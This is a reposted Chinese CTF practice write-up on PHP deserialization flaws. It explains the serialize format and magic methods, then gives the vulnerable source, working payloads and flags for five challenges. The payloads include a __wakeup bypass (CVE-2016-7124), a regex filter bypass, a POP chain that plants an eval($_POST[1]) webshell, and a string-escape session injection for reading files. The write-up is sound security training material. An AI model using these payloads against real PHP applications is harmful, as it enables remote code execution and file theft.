编程语言
首页 > 编程语言> > 周练3(php反序列化)

周练3(php反序列化)

作者:互联网

 

 

 

 

 

 

 

 

 

 

 

serialize()函数

$s = serialize($变量); //该函数将变量数据进行序列化转换为字符串

file_put_contents(‘./目标文本文件', $s); //将$s保存到指定文件

a - array         b - boolean

d - double         i - integer

o - common object     r - reference

s - string         C - custom object

O - class         N - null

R - pointer reference   U - unicode string

了解了缩写的类型字母,便可以得到PHP序列化格式

1

2

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}

对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

unserialize()函数

$s = file_get_contents(‘./目标文本文件'); //取得文本文件的内容(之前序列化过的字符串)

$变量 = unserialize($s); //将该文本内容,反序列化到指定的变量中

魔术方法

1

2

3

4

5

6

7

8

9

10

11

12

13

14

__construct  当一个对象创建时被调用,

__destruct  当一个对象销毁时被调用,

__toString  当一个对象被当作一个字符串被调用。

__wakeup()  使用unserialize时触发

__sleep()  使用serialize时触发

__destruct()  对象被销毁时触发

__call()  在对象上下文中调用不可访问的方法时触发

__callStatic()  在静态上下文中调用不可访问的方法时触发

__get()  用于从不可访问的属性读取数据

__set()  用于将数据写入不可访问的属性

__isset()  在不可访问的属性上调用isset()或empty()触发

__unset()   在不可访问的属性上使用unset()时触发

__toString()  把类当作字符串使用时触发,返回值需要为字符串

__invoke()  当脚本尝试将对象调用为函数时触发本特性

只在 PHP 5.3.0 及以上版本有效。

 

 

 

 

 

 

 

wakeup()魔法函数绕过

 

1

2

PHP5<5.6.25

PHP7<7.0.10

 

PHP反序列化漏洞CVE-2016-7124

 

#a#重点:当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行

 

1.unserialize3

 

 

class xctf{                      //定义一个名为xctf的类
public $flag = '111';            //定义一个公有的类属性$flag,值为111
public function __wakeup(){      //定义一个公有的类方法__wakeup(),输出bad requests后退出当前脚本
exit('bad requests');
}
}
?code=

the answer is : cyberpeace{24a1e95dab10ea486aed8d9ffccbcbd1}

2.Web_php_unserialize

 

highlight_file() 函数对文件进行语法高亮显示。

语法

highlight_file(filename,return)
参数描述
filename 必需。要进行高亮处理的 PHP 文件的路径。
return 可选。如果设置 true,则本函数返回高亮处理的代码。
<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; (赋值)
    }
function __destruct() { echo @highlight_file($this->file, true); }
function __wakeup() { //需绕过 if ($this->file != 'index.php') { //the secret is in the fl4g.php(提示) $this->file = 'index.php';   } }
} if (isset($_GET['var'])) { $var = base64_decode($_GET['var']); //base64解码 if (preg_match('/[oc]:\d+:/i', $var)) { //黑名单'o:c',可以用'o:+c'替代 die('stop hacking!'); } else { @unserialize($var); } } else { highlight_file("index.php"); } ?>

“O:+4:“Demo”:3:{s:10:“Demofile”;s:8:“fl4g.php”;}”

 

$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

 

3.[极客大挑战 2019]PHP

 

 
<?php
    include 'class.php';
    $select = $_GET['select'];//传入参数
    $res=unserialize(@$select);
    ?>
<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';        //初始化
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;      //赋值
    }
    function __wakeup(){
        $this->username = 'guest';       //需绕过
    }
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
                  die();          //password=100
        }
        if ($this->username === 'admin') {  //username='admin'
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();     
        }
    }
}
?>

 

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

 

flag{d2e7fc8f-788c-45b9-a16b-a84c7a09ee20}

4. web/fxlh1/

<?php
class crow
{
    public $v1;
    public $v2;
    function eval() {
        echo new $this->v1($this->v2);
    }
    public function __invoke()
    {
        $this->v1->world();      //3. 引发_call函数
    }
}
class fin
{
    public $f1;
    public function __destruct()
    {
        echo $this->f1 . '114514';   //6. 调用_tostring()函数
    }
    public function run()
    {
        ($this->f1)();          
    }
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();  //2. 调用get_flag()函数
    }
}
class what
{
    public $a;
    public function __toString()
    {
        $this->a->run();        //5. 调用run()函数
        return 'hello';
    }
}
class mix
{
    public $m1;
    public function run()
    {
        ($this->m1)();          //4. 引发_invoke函数
    }
    public function get_flag()
    {
        eval('#'.$this->m1);      //1.目标
    }
}
highlight_file(__FILE__);
if (isset($_POST['pop'])) {
    unserialize($_POST['pop']);
}
<?php
class crow
{
    public $v1;
    public $v2;

    public function __construct($v1)
    {
        $this->v1 = $v1;
    }
}

class fin
{
    public $f1;

    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

class what
{
    public $a;

    public function __construct($a)
    {
        $this->a = $a;
    }
}
class mix
{
    public $m1;

    public function __construct($m1)
    {
        $this->m1 = $m1;
    }

}

$f = new mix("?><?=eval(\$_POST[1]);");
$e = new fin($f);
$d = new crow($e);
$c = new mix($d);
$b = new what($c);
$a = new fin($b);
echo urlencode(serialize($a));
//O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?>
//cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1

5.[安洵杯 2019]easy_serialize_php 1

考点

 <?php
$function = @$_GET['f'];
//构造过滤函数 function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); } //初赋值 $_SESSION["user"] = 'guest'; $_SESSION['function'] = $function; extract($_POST);                            //可以实现变量覆盖 if(!$function){ echo '<a href="index.php?f=highlight_file">source_code</a>'; } if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png');      //img赋值 }else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); } $serialize_info = filter(serialize($_SESSION)); if($function == 'highlight_file'){ highlight_file('index.php'); }else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here!(发现d0g3_f1ag.php) }else if($function == 'show_image'){                   //确定function的值 $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img']));    //目标 }

_SESSION[function]=show_image&_SESSION[1]=";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

a:3:{s:8:"function";s:10:"show_image"

;i:1;s:41:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";

s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}

a:3:{s:8:"function";s:22:"show_image";i:1;s:60:"";

s:3:"qwe";s:2:"qw";

s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

";s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}


标签:__,function,php,img,echo,file,周练,序列化,public
来源: https://www.cnblogs.com/mayylu/p/16181398.html